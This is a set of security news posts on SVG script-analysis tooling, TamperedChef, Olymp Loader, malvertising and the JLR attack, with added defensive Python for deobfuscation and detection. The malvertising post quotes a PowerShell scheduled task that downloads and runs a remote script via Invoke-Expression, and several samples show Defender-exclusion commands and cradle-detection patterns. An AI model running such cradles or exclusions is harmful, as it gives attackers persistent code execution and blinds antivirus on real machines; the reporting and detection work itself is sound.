• As attackers increasingly leverage Scalable Vector Graphics (SVG) for stealthy code injection, security researchers face mounting challenges in detecting obfuscated payloads embedded within SVG assets. 

    The SVG Security Analysis Toolkit by HackingLZ offers a comprehensive solution: a suite of four Python-based tools designed to reveal hidden scripts, decode obfuscated URLs, and verify protection mechanisms, all without exposing analysts to unsafe execution environments.

    Static and Dynamic Deobfuscation

    The toolkit’s first two components, extract.py and extract_dynamic.py, work in tandem to uncover malicious scripts through static and dynamic analysis respectively:

    extract.py is a static SVG URL extractor that performs pattern-based analysis without executing any code.

    It automatically detects and decodes XOR-encrypted payloads assembled with String.fromCharCode, Base64-encoded URLs embedded in data: URIs, and character-arithmetic schemes built from parseInt and XOR loops.

    extract_dynamic.py performs dynamic JavaScript execution: it uses box-js to run the embedded JavaScript inside a sandbox and capture the final URL the script constructs, so the analyst never executes the sample directly. Key features include:

    • Advanced Hook System for monitoring location.assign(), window.open(), and AJAX calls
    • Final URL Prioritization to distinguish complete URLs from partial fragments
    • ActiveX/WScript Support for Windows-specific script monitoring
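    The static decoding patterns described above, as an added example that is not HackingLZ's extract.py: it pulls the script bodies out of an SVG (with a regex fallback for the malformed XML that malicious samples often are), brute-forces the single-byte XOR key behind a String.fromCharCode loop instead of trying to parse the key out of the JavaScript, and base64-decodes data: URIs before searching them for URLs. The sample SVG and its hostnames are constructed for this example.

```python
"""Static extraction of obfuscated URLs from SVG <script> content.

Added example, not HackingLZ's extract.py: a minimal, self-contained version
of two of the decoding patterns the toolkit handles. The SVG below is
constructed for this example; its hostnames are placeholders.
"""
import base64
import binascii
import re
import xml.etree.ElementTree as ET

URL_RE = re.compile(r"https?://[\w.\-]+(?:/[\w.\-/%?=&#]*)?")
INT_ARRAY_RE = re.compile(r"\[\s*(\d+(?:\s*,\s*\d+){3,})\s*\]")   # 4+ integers
DATA_URI_RE = re.compile(r"data:[^,\"'\s]*;base64,([A-Za-z0-9+/=]+)")
SCRIPT_FALLBACK_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)


def script_bodies(svg_text):
    """Text of every <script> element; regex fallback when the SVG is not
    well-formed XML, which malicious samples frequently are not."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError:
        return SCRIPT_FALLBACK_RE.findall(svg_text)
    return [el.text or "" for el in root.iter()
            if isinstance(el.tag, str) and el.tag.endswith("script")]


def decode_fromcharcode_xor(js):
    """Recover URLs from String.fromCharCode(arr[i] ^ k) loops. Rather than
    locating k in the script, try every single-byte key (k = 0 also covers a
    plain fromCharCode array) and keep only decodings that look like a URL."""
    found = set()
    for m in INT_ARRAY_RE.finditer(js):
        nums = [int(n) for n in m.group(1).split(",")]
        for key in range(256):
            found.update(URL_RE.findall("".join(chr(n ^ key) for n in nums)))
    return sorted(found)


def decode_data_uris(text):
    """Base64-decode data: URIs and search the payload for URLs, including
    fromCharCode arrays nested inside the decoded HTML/JS."""
    found = set()
    for b64 in DATA_URI_RE.findall(text):
        try:
            decoded = base64.b64decode(b64).decode("utf-8", "replace")
        except binascii.Error:
            continue
        found.update(URL_RE.findall(decoded))
        found.update(decode_fromcharcode_xor(decoded))
    return sorted(found)


def extract_urls(svg_text):
    """Union of literal, XOR-decoded and data:-URI-decoded URLs."""
    found = set()
    for js in script_bodies(svg_text):
        found.update(URL_RE.findall(js))
        found.update(decode_fromcharcode_xor(js))
    found.update(decode_data_uris(svg_text))
    return sorted(found)


# --- constructed sample (not a real phishing asset) -------------------------
PLAIN_URL = "https://example.invalid/login"
XOR_KEY = 0x2A
XORED = ",".join(str(ord(c) ^ XOR_KEY) for c in PLAIN_URL)
B64_HTML = base64.b64encode(
    b"<script>location.assign('https://example.invalid/b64')</script>").decode()

SAMPLE_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg">
  <script><![CDATA[
    var k = {XOR_KEY};
    var a = [{XORED}];
    var s = '';
    for (var i = 0; i < a.length; i++) s += String.fromCharCode(a[i] ^ k);
    window.location = s;
  ]]></script>
  <foreignObject width="1" height="1">
    <iframe xmlns="http://www.w3.org/1999/xhtml" src="data:text/html;base64,{B64_HTML}"></iframe>
  </foreignObject>
</svg>"""

if __name__ == "__main__":
    for url in extract_urls(SAMPLE_SVG):
        print(url)
```

    Brute-forcing the key is deliberate: samples frequently compute the key from an expression or an ES6 Proxy rather than a literal, and checking 256 candidates against a URL regex is cheaper than parsing the JavaScript.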

    Protection Detection

    To complete the analysis workflow, the toolkit includes cf_probe.py and encoder.py. cf_probe.py is a Cloudflare protection detection program that follows HTTP and meta-refresh redirects and checks the responses for Cloudflare challenges.

    It identifies Turnstile via data-sitekey attributes, scans linked JavaScript for reCAPTCHA or custom CAPTCHA systems, and reports Cloudflare headers such as CF-Ray and DDoS-protection messages.

    encoder.py is an SVG test-case generator: security teams can generate realistic obfuscated SVG samples to validate their detection pipelines.

    It supports six obfuscation patterns, including XOR + ES6 Proxy, hex-encoded Function constructor, and data: URI scripts.

    HackingLZ recommends the following analysis sequence for maximum coverage and safety:

    • Generate Test Cases: encoder.py --random-all -o test_cases/
    • Static Analysis: python3 extract.py -i test_cases/*.svg -v
    • Dynamic Analysis: python3 extract_dynamic.py -i test_cases/ -o dynamic_results/
    • Protection Verification: python3 cf_probe.py -i malicious_urls.txt

    By combining static string decoding, sandboxed script execution, protection detection, and controlled test data generation, the SVG Security Analysis Toolkit empowers defenders to stay ahead of evasive SVG-based phishing and malware campaigns.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post SVG Security Analysis Toolkit to Detect Malicious Scripts Hidden in SVG Files appeared first on Cyber Security News.


  • Adversaries don’t work 9–5 and neither do we. At eSentire, our 24/7 SOCs are staffed with elite threat hunters and cyber analysts who hunt, investigate, contain and respond to threats within minutes. Backed by threat intelligence, tactical threat response and advanced threat analytics from our Threat Response Unit (TRU), eSentire delivers rapid detection and disruption […]

    The post New Spear-Phishing Attack Deploys DarkCloud Malware to Steal Keystrokes and Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A sophisticated malware campaign has emerged that weaponizes seemingly legitimate productivity tools to infiltrate systems and steal sensitive information.

    The TamperedChef malware represents a concerning evolution in threat actor tactics, utilizing trojanized applications disguised as calendar tools and image viewers to bypass traditional security defenses.

    This campaign demonstrates how cybercriminals increasingly exploit user trust in digitally signed software to facilitate initial access and establish persistent footholds within targeted environments.

    The malware campaign centers around two primary applications: Calendaromatic.exe and ImageLooker.exe, both masquerading as benign productivity software while harboring malicious capabilities.

    These applications are distributed through self-extracting 7-Zip archives that exploit CVE-2025-0411 to evade Windows’ Mark of the Web protections, allowing them to execute without triggering SmartScreen warnings or other reputation-based security controls.

    The campaign leverages deceptive advertising and search engine optimization techniques to direct victims toward malicious downloads, often targeting users searching for free productivity utilities.

    Field Effect analysts identified the campaign on September 22, 2025, during routine analysis of a potentially unwanted application flagged by Microsoft Defender.

    Their investigation revealed a broader distribution network involving multiple suspicious signing publishers and command-and-control infrastructure.

    The researchers discovered that both malicious applications were digitally signed by entities including CROWN SKY LLC and LIMITED LIABILITY COMPANY APPSOLUTE, providing a veneer of legitimacy that helps bypass user suspicion and endpoint defenses.

    The malware’s impact extends beyond simple data theft, as it establishes comprehensive system compromise through browser hijacking, credential harvesting, and persistent backdoor access.

    TamperedChef demonstrates particular sophistication in its ability to exfiltrate browser-stored credentials and session information while simultaneously redirecting web traffic and altering browser settings to facilitate ongoing malicious activities.

    Advanced Evasion Through Unicode Encoding and Framework Exploitation

    The TamperedChef campaign showcases remarkable technical sophistication through its exploitation of modern application frameworks and advanced encoding techniques.

    Both Calendaromatic.exe and ImageLooker.exe are built using NeutralinoJS, a lightweight desktop framework that enables the execution of arbitrary JavaScript code within native applications.

    This framework choice allows the malware to seamlessly interact with system APIs while maintaining the appearance of legitimate desktop software.

    The malware employs Unicode homoglyphs as a primary evasion mechanism, encoding malicious payloads within seemingly benign API responses.

    This technique enables the malware to bypass traditional string-based detection systems and signature matching algorithms that security products rely upon for identification.

    When executed, the malware decodes these hidden payloads and executes them through the NeutralinoJS runtime, effectively creating a covert execution channel that operates beneath the radar of conventional monitoring systems.

    Persistence mechanisms include the creation of scheduled tasks and registry modifications using specific command-line flags such as --install, --enableupdate, and --fullupdate.

    Upon successful installation, the malware establishes immediate communication with command-and-control servers including calendaromatic[.]com and movementxview[.]com, enabling remote operators to issue commands and exfiltrate collected data.

    The network communication occurs through encrypted channels that further complicate detection and analysis efforts by security teams.


    The post New TamperedChef Malware Leverages Productivity Tools to Gain Access and Exfiltrate Sensitive Data appeared first on Cyber Security News.


  • Jaguar Land Rover (JLR) has confirmed it will begin a phased restart of its manufacturing operations in the coming days, nearly a month after a significant cyber attack forced the company to halt production across the United Kingdom.

    The luxury carmaker, owned by India’s Tata Motors, is taking gradual steps to bring its facilities back online while working with national cybersecurity agencies to ensure a secure recovery.

    The incident began on the evening of August 31, 2025, when a cyber attack prompted JLR to suspend all work at its three main UK manufacturing plants in Solihull, Wolverhampton, and Halewood on September 1.

    The shutdown had an immediate and severe impact, halting the production of its world-class vehicles and creating significant disruption throughout its extensive supply chain.

    The stoppage affected over 30,000 direct JLR employees and an estimated 100,000 more working for hundreds of suppliers, many of whom depend heavily on JLR’s orders.

    JLR Confirms Phased Restart

    In a statement, JLR announced its plans for a cautious return to manufacturing. “As the controlled, phased restart of our operations continues, we are taking further steps towards our recovery and the return to manufacture of our world-class vehicles,” a company spokesperson said.

    “Today we are informing colleagues, retailers and suppliers that some sections of our manufacturing operations will resume in the coming days”.

    The restart is expected to begin with the engine plant in Wolverhampton on October 6, with other facilities gradually resuming their functions. However, industry insiders anticipate it could take several weeks before production lines are operating at full capacity again.

    Throughout the shutdown, JLR has been collaborating with cybersecurity specialists, the UK government’s National Cyber Security Centre (NCSC), and law enforcement to manage the crisis.

    “We continue to work around the clock… to ensure our restart is done in a safe and secure manner,” the company stated. While JLR confirmed that “some data” was compromised in the attack, it is still conducting a forensic investigation to determine the full extent of the impact.

    The prolonged production halt placed immense financial pressure on JLR’s supply chain, with many smaller firms facing the risk of insolvency.

    In response, the UK government stepped in over the weekend, offering £1.5 billion in loan guarantees to JLR to help stabilize its cash flow and support its vulnerable suppliers.

    As the foundational work of its recovery gets underway, JLR has thanked its employees, retailers, and partners for their patience and support during the disruption.

    The company has assured it will continue to provide updates as it navigates the complex process of returning to full-scale manufacturing.


    The post JLR Confirms Phased Restart of Operations Following Cyber Attack appeared first on Cyber Security News.


  • The cybersecurity community is currently observing a surge in interest around Olymp Loader, a recently unveiled Malware-as-a-Service (MaaS) platform written entirely in Assembly.

    First advertised on underground forums and Telegram channels in early June 2025, Olymp Loader has rapidly evolved from a rudimentary botnet concept into a sophisticated loader and crypter suite.

    Its author, operating under the alias OLYMPO, touts the service as Fully UnDetectable (FUD), claiming that its advanced design can bypass modern antivirus engines and evade machine-learning–based heuristics.

    Early adopters praise its modular architecture, which integrates credential stealers, crypters, and privilege escalation mechanisms.

    Research indicates that the threat actor behind OLYMPO is a small team with extensive Assembly programming expertise.

    As reported on HackForums and other underground venues, they have implemented features such as deep XOR encryption for payload modules, UAC‐Flood privilege escalation, and automatic Windows Defender exclusions.

    On August 5, 2025, OLYMPO announced pricing tiers ranging from a basic stub at USD 50 to a fully customized injection service at USD 200, with all packages including a “Defender-way” bypass, Defender-removal module, and automatic certificate signing to lend samples a veneer of legitimacy.

    Banner used to advertise Olymp Loader in underground forums posted on June 6, 2025 (Source – Outpost24)

    Outpost24 analysts identified multiple instances of Olymp Loader in the wild, often masquerading as legitimate software.

    For example, binaries named NodeJs[.]exe were distributed via GitHub Releases under the repository PurpleOrchid65Testing, exploiting developer trust in Node.js executables.

    In other cases, the loader was delivered as fake installers for OpenSSL, Zoom, PuTTY, and CapCut, even borrowing official icons and certificates from known applications to trick victims.

    Infection Mechanism and Persistence

    Upon execution, Olymp Loader initiates a multi‐stage process to establish persistence and disable defenses.

    Initial samples observed in June employed a simple batch script: copying the executable to the user’s AppData directory and spawning a cmd[.]exe process to run a timeout command, followed by re‐execution from the new location.

    Behavior of PowerShell execution commands seen in a Olymp sample on public sandboxes (Source – Outpost24)

    A PowerShell script was then launched to create an entry in the StartUp folder, ensuring the loader runs on each system boot.

    By early August, this workflow was augmented with a Defender Remover module, publicly available on GitHub, which executes PowerRun[.]exe and a RemoveSecHealthApp[.]ps1 script to terminate Defender services before adding exhaustive exclusion paths (APPDATA, LOCALAPPDATA, Desktop, StartMenu, and more) via Add-MpPreference.
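    One way to catch the exclusion step described above in telemetry, as an added example that is neither Outpost24's analysis code nor the loader's own: PowerShell script-block logging (Event ID 4104) records the Add-MpPreference call, so the detection only has to decide which exclusions are over-broad. The function below normalises $env:/%VAR% references, then flags paths that cover a whole user-writable root (APPDATA, LOCALAPPDATA, the Desktop, the Start Menu and similar), process exclusions for script hosts, and exclusions for executable extensions, while leaving a narrow vendor-style exclusion alone. The event records, the root list and the label names are this example's own assumptions, not a product signature.

```python
"""Flag over-broad Windows Defender exclusions in PowerShell 4104 script blocks.

Added example (not Outpost24's and not Olymp Loader's code). The event
records below are constructed; the roots and label names are assumptions
chosen for this example.
"""
import re

# Roots (after $env:/%VAR% normalisation) whose exclusion neuters Defender for
# anything a loader drops there, keyed by root -> sub-folders also treated as
# broad ("" means the root itself). Assumption: a starting point, not a rule set.
BROAD_SUBFOLDERS = {
    "<userprofile>": {"", "desktop", "downloads", "documents",
                      "appdata", "appdata\\roaming", "appdata\\local"},
    "<appdata>": {"", "microsoft\\windows\\start menu",
                  "microsoft\\windows\\start menu\\programs\\startup"},
    "<localappdata>": {"", "temp"},
    "<temp>": {""}, "<tmp>": {""}, "<programdata>": {""}, "<public>": {""},
    "c:": {"", "users", "programdata", "windows\\temp"},
}
RISKY_PROCESSES = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "rundll32.exe", "regsvr32.exe"}
RISKY_EXTENSIONS = {".exe", ".dll", ".ps1", ".bat", ".cmd", ".vbs", ".js", ".scr"}

ADD_MP = re.compile(r"add-mppreference\b([^\r\n;|]*)", re.I)
PARAM = re.compile(
    r"-exclusion(path|process|extension)\s+"
    r"((?:\"[^\"]*\"|'[^']*'|[^\s,]+)(?:\s*,\s*(?:\"[^\"]*\"|'[^']*'|[^\s,]+))*)", re.I)
VALUE = re.compile(r"\"[^\"]*\"|'[^']*'|[^\s,]+")
ENV = re.compile(r"\$env:(\w+)|%(\w+)%|\$\{env:(\w+)\}", re.I)


def normalize(value):
    """Strip quotes, fold $env:X / %X% / ${env:X} to <x>, lower-case, drop
    trailing separators and wildcards so 'APPDATA\\*' and '$env:APPDATA' agree."""
    v = value.strip().strip("'\"").strip()
    v = ENV.sub(lambda m: "<" + (m.group(1) or m.group(2) or m.group(3)).lower() + ">", v)
    return v.replace("/", "\\").lower().rstrip("\\*")


def is_broad_path(norm):
    root, _, rest = norm.partition("\\")
    subs = BROAD_SUBFOLDERS.get(root)
    if subs is None:
        return False
    if rest in subs:
        return True
    # c:\users\<name>[\<folder>]: a whole profile or one of its top folders.
    parts = rest.split("\\")
    return (root == "c:" and len(parts) >= 2 and parts[0] == "users"
            and "\\".join(parts[2:]) in BROAD_SUBFOLDERS["<userprofile>"])


def audit_script_block(text):
    """Return [(kind, normalised value)] for each risky exclusion in one block."""
    findings = []
    for call in ADD_MP.finditer(text):
        for kind, raw in PARAM.findall(call.group(1)):
            kind = kind.lower()
            for tok in VALUE.findall(raw):
                norm = normalize(tok)
                if kind == "path" and is_broad_path(norm):
                    findings.append(("broad_path", norm))
                elif kind == "process" and norm.rsplit("\\", 1)[-1] in RISKY_PROCESSES:
                    findings.append(("risky_process", norm))
                elif kind == "extension" and "." + norm.lstrip(".") in RISKY_EXTENSIONS:
                    findings.append(("risky_extension", "." + norm.lstrip(".")))
    return findings


def audit_events(events):
    """events: iterable of {"record": <EventRecordID>, "script": <ScriptBlockText>}."""
    return [{"record": ev["record"], "kind": k, "value": v}
            for ev in events for k, v in audit_script_block(ev["script"])]


# Constructed 4104 ScriptBlockText samples, modelled on the exclusion list above.
SAMPLE_EVENTS = [
    {"record": 101, "script": r'Add-MpPreference -ExclusionPath $env:APPDATA, $env:LOCALAPPDATA, '
                              r'"$env:USERPROFILE\Desktop", "$env:APPDATA\Microsoft\Windows\Start Menu" '
                              r'-ExclusionProcess powershell.exe'},
    {"record": 102, "script": r"Add-MpPreference -ExclusionPath 'C:\Program Files\Vendor\build-cache'"},
    {"record": 103, "script": "Get-MpPreference | Select-Object ExclusionPath"},
    {"record": 104, "script": "Add-MpPreference -ExclusionExtension ps1, exe"},
]

if __name__ == "__main__":
    for f in audit_events(SAMPLE_EVENTS):
        print(f"record {f['record']}: {f['kind']} {f['value']}")
```

    Pair this with an alert on Set-MpPreference -DisableRealtimeMonitoring and on service-stop events for WinDefend; the exclusion list is only the last step of the sequence the loader runs.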

    The loader’s shellcode component leverages the LoadPE method for code‐cave–based injection into legitimate processes, supporting 32‐bit, 64‐bit, .NET, and Java payloads.

    Unique shellcode initialization routines further obfuscate the loader’s purpose, while a custom certificate signing feature signs both the stub and modules, complicating detection by reputation‐based systems.

    This combination of script‐based persistence, injection techniques, and automatic certificate signing marks a significant advancement in MaaS offerings, lowering the entry barrier for mid‐level cybercriminals and amplifying attack volumes across enterprises and developers alike.


    The post New Malware-as-a-Service Olymp Loader Promises Defender-Bypass With Automatic Certificate Signing appeared first on Cyber Security News.


  • Jaguar Land Rover (JLR) has announced the controlled resumption of manufacturing operations following a significant cyberattack that disrupted its production facilities. The British luxury automaker confirmed that some sections of its manufacturing operations will resume in the coming days as part of a carefully orchestrated recovery plan. The company issued a statement indicating that its […]

    The post Jaguar Land Rover Confirms Gradual Restart of Operations Post-Cyberattack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • A sophisticated malware campaign dubbed “TamperedChef” is exploiting trojanized productivity tools—disguised as seemingly benign applications—to bypass security controls, establish persistence, and siphon sensitive information from targeted systems. On September 22, 2025, Field Effect researchers investigating a potentially unwanted application (PUA) flagged by Microsoft Defender uncovered two malicious applications—ImageLooker.exe and Calendaromatic.exe—delivered via self-extracting 7-Zip archives. Both […]

    The post New TamperedChef Malware Exploits Productivity Tools to Access and Exfiltrate Sensitive Data appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • Cybersecurity never stops—and neither do hackers. While you wrapped up last week, new attacks were already underway. From hidden software bugs to massive DDoS attacks and new ransomware tricks, this week’s roundup gives you the biggest security moves to know. Whether you’re protecting key systems or locking down cloud apps, these are the updates you need before making your next security


  • A newly discovered zero-click remote code execution (RCE) vulnerability in WhatsApp is putting millions of Apple users at risk. Researchers from DarkNavyOrg have demonstrated a proof-of-concept (PoC) exploit that leverages two distinct flaws to compromise iOS, macOS, and iPadOS devices without any user interaction. The attack chain begins with CVE-2025-55177, a critical logic error in WhatsApp’s message […]

    The post WhatsApp 0-Click Flaw Abused via Malicious DNG Image File appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.


  • In recent months, cybersecurity teams have observed an alarming trend in which malicious actors exploit Facebook and Google advertising channels to masquerade as legitimate financial services.

    By promoting free or premium access to well-known trading platforms, these threat actors have successfully lured unsuspecting users into downloading trojanized applications.

    The campaign’s social engineering tactics leverage familiar branding and verified badges, creating a veneer of authenticity that bypasses casual scrutiny.

    Victims are redirected through paid ad placements toward obfuscated payloads designed to evade automated analysis and human review.

    Initial infections typically begin with clicks on Facebook Ads promising “one-year free access” to premium charting tools.

    Users are directed to landing pages that host customized service worker scripts, often encrypted with AES-CBC and loaded via StreamSaver.js to deliver a malicious installer under the guise of a legitimate executable.

    Once downloaded, the oversized loader—sometimes over 700 MB—employs anti-sandbox checks, preventing execution in virtualized environments. Only upon passing these defenses does the downloader initiate its multi-stage process.

    Bitdefender analysts noted that after breaching these initial defenses, the malware shifts to a WebSocket communication channel on port 30000, replacing the older HTTP-based approach used in previous campaigns.

    The threat actors encrypted their front-end JavaScript, then deployed a deobfuscation routine at runtime to construct the final payload.

    This dynamic approach foils most static analysis tools and significantly increases the complexity of forensic investigations.

    A successful execution triggers the creation of a persistent Scheduled Task named EdgeResourcesInstallerV12-issg, which downloads and executes subsequent PowerShell scripts via Invoke-Expression.

    This task not only ensures reinfection on system restart but also modifies Windows Defender settings to exclude its payload directories.

    The following excerpt illustrates the Scheduled Task registration:

    $action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -Command "Invoke-Expression $(Invoke-WebRequest -UseBasicParsing https://malicious-domain.com/next.ps1)"'
    $trigger = New-ScheduledTaskTrigger -AtStartup
    Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'EdgeResourcesInstallerV12-issg' -Description 'Windows Edge resources updater'
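    The registration above, and the scheduled-task persistence the TamperedChef post describes with its --install, --enableupdate and --fullupdate flags, both leave an artifact a defender can export and triage. Below is an added example, not Bitdefender's, Field Effect's or either campaign's code: it parses the XML that `schtasks /query /tn <name> /xml` or Export-ScheduledTask produce and flags an Exec action that runs PowerShell with an Invoke-Expression plus Invoke-WebRequest cradle or a hidden window, that launches one of the trojanized binaries named on this page, or that carries those flags, and notes whether a boot or logon trigger makes it persistence. The three task exports and their paths are constructed for this example; the indicator regexes are the example's own, not a vendor signature.

```python
"""Triage exported Windows scheduled tasks for download-and-execute cradles.

Added example, not Bitdefender's, Field Effect's or the malware's code. The
task XML samples below are constructed; the indicator regexes are this
example's own assumptions.
"""
import ntpath
import re
import xml.etree.ElementTree as ET

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

SUSPICIOUS_ARGS = [
    ("iex_cradle", re.compile(
        r"(invoke-expression|\biex\b).*(invoke-webrequest|\biwr\b|downloadstring|net\.webclient)", re.I)),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("tamperedchef_flags", re.compile(r"--(install|enableupdate|fullupdate)\b", re.I)),
]
SUSPICIOUS_BINARIES = {"calendaromatic.exe", "imagelooker.exe"}


def parse_task(xml_text):
    """Pull the first Exec action and the trigger types out of a task XML export."""
    root = ET.fromstring(xml_text)
    exec_el = root.find(f"{TASK_NS}Actions/{TASK_NS}Exec")
    trig_el = root.find(f"{TASK_NS}Triggers")
    return {
        "description": root.findtext(f"{TASK_NS}RegistrationInfo/{TASK_NS}Description", default=""),
        "command": "" if exec_el is None else exec_el.findtext(f"{TASK_NS}Command", default=""),
        "arguments": "" if exec_el is None else exec_el.findtext(f"{TASK_NS}Arguments", default=""),
        "triggers": [] if trig_el is None else [t.tag.replace(TASK_NS, "") for t in trig_el],
    }


def triage_task(xml_text):
    """Parsed task plus the indicator labels that matched and a persistence verdict."""
    info = parse_task(xml_text)
    findings = []
    # ntpath handles the Windows path even when this runs on a Linux analysis box.
    if ntpath.basename(info["command"].strip().strip('"')).lower() in SUSPICIOUS_BINARIES:
        findings.append("known_trojan_binary")
    for label, rx in SUSPICIOUS_ARGS:
        if rx.search(info["arguments"]):
            findings.append(label)
    info["findings"] = findings
    # A cradle that also fires at boot or logon is persistence, not a one-off.
    info["persistent"] = bool(findings) and any(
        t in ("BootTrigger", "LogonTrigger") for t in info["triggers"])
    return info


# Constructed exports. The first mirrors the registration quoted above.
CRADLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Description>Windows Edge resources updater</Description></RegistrationInfo>
  <Triggers><BootTrigger><Enabled>true</Enabled></BootTrigger></Triggers>
  <Actions Context="Author"><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-NoProfile -WindowStyle Hidden -Command "Invoke-Expression $(Invoke-WebRequest -UseBasicParsing https://malicious-domain.com/next.ps1)"</Arguments>
  </Exec></Actions>
</Task>"""

TROJAN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions><Exec>
    <Command>C:\Users\alice\AppData\Local\Calendaromatic\Calendaromatic.exe</Command>
    <Arguments>--enableupdate</Arguments>
  </Exec></Actions>
</Task>"""

BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2025-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions><Exec><Command>C:\Program Files\Vendor\backup.exe</Command><Arguments>--nightly</Arguments></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for xml_text in (CRADLE_TASK_XML, TROJAN_TASK_XML, BENIGN_TASK_XML):
        r = triage_task(xml_text)
        print(r["command"], r["findings"], "persistent" if r["persistent"] else "")
```

    Real exports begin with an XML declaration that names UTF-16; read them as bytes, or strip the declaration, before handing the text to the parser.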

    Infection Mechanism

    The infection mechanism centers on a sophisticated downloader component that leverages both service worker APIs and modern web tracking frameworks to blend malicious operations with legitimate analytics.

    Malicious process (Source – Bitdefender)

    By integrating PostHog for event tracking alongside third-party pixels such as Facebook Pixel, Google Ads Conversion Tracking, and Microsoft Ads Pixel, the front-end application gains visibility into user behavior.

    This telemetry allows operators to selectively deploy malicious content only to high-value targets, serving benign pages to all others.

    Once the user initiates a download, the service worker intercepts the request, decrypts and deobfuscates the payload, then streams the binary through StreamSaver.js to the file system—bypassing traditional browser download safeguards.

    This seamless delivery mechanism, paired with domain rotation and language-specific ads, enables rapid, widespread propagation while maintaining a low profile.


    The post Threat Actors Weaponizing Facebook and Google Ads as Financial Platforms to Steal Sensitive Data appeared first on Cyber Security News.
